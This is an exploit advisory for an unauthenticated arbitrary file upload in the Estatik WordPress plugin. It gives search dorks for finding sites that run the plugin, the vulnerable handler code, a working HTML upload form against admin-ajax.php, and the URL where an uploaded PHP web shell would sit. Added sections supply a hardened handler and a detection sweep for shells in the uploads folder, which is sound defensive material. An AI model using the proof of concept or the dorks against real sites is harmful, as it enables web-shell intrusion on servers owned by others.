<!--
 \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
  \ \ / /| | '__| | | / __|\ /| | | |_ /
   \ V / | | | | |_| \__ \/ \| |_| |/ /
    \_/ |_|_| \__,_|___/_/\_\____//___|
-->
#########################################################
#Exploit Title: Arbitrary File Upload Vulnerability in Estatik
#Category: webapps
#Google Dork : inurl:/wp-content/plugins/estatik/
#            : index of "/wp-content/plugins/estatik/"
#########################################################

[+] In the plugin's AJAX handler (action es_prop_media_images), the following code saves an uploaded file sent with the request. The file name and contents come straight from the request; nothing checks who is calling, what type the file is, or what extension it carries:

// Vulnerable code as found in the plugin: no capability check, no nonce, no file-type check.
// $i is the loop index over the es_media_images[] array sent by the form.
$image_name = time()."_".$_FILES['es_media_images']['name'][$i];   // user-controlled name, extension kept
$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
$targetPath = $upload_dir['path']."/".$image_name;                   // current month's wp-content/uploads dir
move_uploaded_file($sourcePath, $targetPath);                        // moved as-is, so a .php file stays executable

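The following hardened handler is an added example written for this page; it is not Estatik's code or a vendor patch. It assumes the handler is registered only on the authenticated wp_ajax_ hook (never wp_ajax_nopriv_), that the upload form carries a nonce in a field named es_media_nonce created with wp_create_nonce('es_media_upload'), and that only raster images are meant to be accepted. The names es_secure_prop_media_images, es_media_nonce and es_media_upload are assumptions for the example; the action name es_prop_media_images is the one shown in the proof of concept.

```php
<?php
// Added example: a hardened replacement for the es_prop_media_images AJAX handler.
// Assumptions: registered only for logged-in users (wp_ajax_, not wp_ajax_nopriv_),
// nonce field "es_media_nonce" made with wp_create_nonce('es_media_upload'),
// and an image-only allow-list. None of these names are the plugin's own.

add_action( 'wp_ajax_es_prop_media_images', 'es_secure_prop_media_images' );

function es_secure_prop_media_images() {
    // 1. Authorisation: caller is logged in (wp_ajax_) and is allowed to upload files.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // 2. CSRF: reject requests without a valid nonce (check_ajax_referer dies on failure).
    check_ajax_referer( 'es_media_upload', 'es_media_nonce' );

    if ( empty( $_FILES['es_media_images']['name'] ) || ! is_array( $_FILES['es_media_images']['name'] ) ) {
        wp_send_json_error( 'no files', 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';

    // 3. Allow-list of content types; php, phtml, html, svg and anything else is refused.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'webp'     => 'image/webp',
    );

    $saved = array();
    foreach ( array_keys( $_FILES['es_media_images']['name'] ) as $i ) {
        // $_FILES for "es_media_images[]" is column-oriented; rebuild the per-file
        // array that wp_handle_upload() expects.
        $file = array(
            'name'     => sanitize_file_name( $_FILES['es_media_images']['name'][ $i ] ),
            'type'     => $_FILES['es_media_images']['type'][ $i ],
            'tmp_name' => $_FILES['es_media_images']['tmp_name'][ $i ],
            'error'    => $_FILES['es_media_images']['error'][ $i ],
            'size'     => $_FILES['es_media_images']['size'][ $i ],
        );
        if ( UPLOAD_ERR_OK !== $file['error'] || ! is_uploaded_file( $file['tmp_name'] ) ) {
            continue;
        }
        // 4. Check extension AND magic bytes together: a .php renamed to .png, or
        //    a "shell.png.php", fails this check.
        $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
        if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
            continue;
        }
        if ( ! empty( $check['proper_filename'] ) ) {
            $file['name'] = $check['proper_filename'];
        }
        // 5. wp_handle_upload() re-validates the MIME type, strips path components and
        //    picks a unique name inside the uploads directory.
        $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
        if ( isset( $result['error'] ) ) {
            continue;
        }
        $saved[] = $result['url'];
    }

    wp_send_json_success( array( 'uploaded' => $saved ) );
}
```

The two checks that matter most are the first and fourth: without the capability and nonce checks an anonymous POST to admin-ajax.php reaches the handler at all, and without wp_check_filetype_and_ext() a file whose name ends in .php is written next to web-served content regardless of what its bytes contain.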
[+] Proof of Concept:

The following proof of concept will upload the selected file and put it in the current
month's directory inside of the /wp-content/uploads/ directory.
The name of the file in the upload directory will be the time the file
was saved, as output by the function time(), followed by a "_"
and then the name of the file as it was uploaded.

Make sure to replace "[path to WordPress]" with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

[+] shell access:

http://www.Target.com/wp-content/uploads/time/shell.php

Video
https://youtu.be/G80_JRsuY88
Bye..
Algerien Hacker
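For site owners checking whether this upload path has already been abused, the sweep below is an added example (not part of the advisory) that walks wp-content/uploads and reports files that should never live there: server-interpreted extensions, files whose first bytes contain a PHP open tag, and non-image files carrying the "<unix time>_" prefix the vulnerable handler produced. The uploads path, the extension lists and the script name scan_uploads.php are assumptions for the example.

```php
<?php
// Added detection sweep: report suspicious files under wp-content/uploads.
// Assumes it is run from the CLI with the uploads path as the first argument, e.g.
//   php scan_uploads.php /var/www/html/wp-content/uploads
// Exit code 1 when something was found, 0 when clean, 2 on a bad path.

$root = $argv[1] ?? 'wp-content/uploads';
if ( ! is_dir( $root ) ) {
    fwrite( STDERR, "not a directory: $root\n" );
    exit( 2 );
}

// Extensions legitimately produced by the media library; everything else is at least worth a look.
$image_ext = array( 'jpg', 'jpeg', 'png', 'gif', 'webp', 'bmp', 'ico' );
$findings  = array();

$iter = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS )
);
foreach ( $iter as $path => $info ) {
    if ( ! $info->isFile() ) {
        continue;
    }
    $name    = $info->getFilename();
    $ext     = strtolower( $info->getExtension() );
    $reasons = array();

    // Executable or server-interpreted extensions have no business in an uploads tree.
    if ( preg_match( '/^(php\d?|phtml|phar|cgi|pl|sh|htaccess|html?|js)$/', $ext ) ) {
        $reasons[] = "extension .$ext";
    }
    // A PHP open tag in the first 4 KiB catches a "picture.png" that is really a web shell.
    $head = file_get_contents( $path, false, null, 0, 4096 );
    if ( false !== $head && false !== stripos( $head, '<?php' ) ) {
        $reasons[] = 'contains <?php';
    }
    // The vulnerable handler named files "<unix time>_<original name>";
    // that prefix on a non-image is a strong signal of this exact upload path.
    if ( preg_match( '/^\d{10}_/', $name ) && ! in_array( $ext, $image_ext, true ) ) {
        $reasons[] = 'estatik-style time prefix on non-image';
    }
    if ( $reasons ) {
        $findings[] = array(
            'file'  => $path,
            'mtime' => date( 'c', $info->getMTime() ),
            'why'   => $reasons,
        );
    }
}

foreach ( $findings as $f ) {
    printf( "%s  %s  (%s)\n", $f['mtime'], $f['file'], implode( ', ', $f['why'] ) );
}
exit( $findings ? 1 : 0 );
```

The modification time printed for each hit lines up with the web server's access log: a POST to /wp-admin/admin-ajax.php with action=es_prop_media_images at the same timestamp, followed by GET requests to the flagged path, is the sequence to look for. Pair the sweep with a web server rule that refuses to execute PHP under wp-content/uploads, which turns any file that slips through a future upload bug into plain static content.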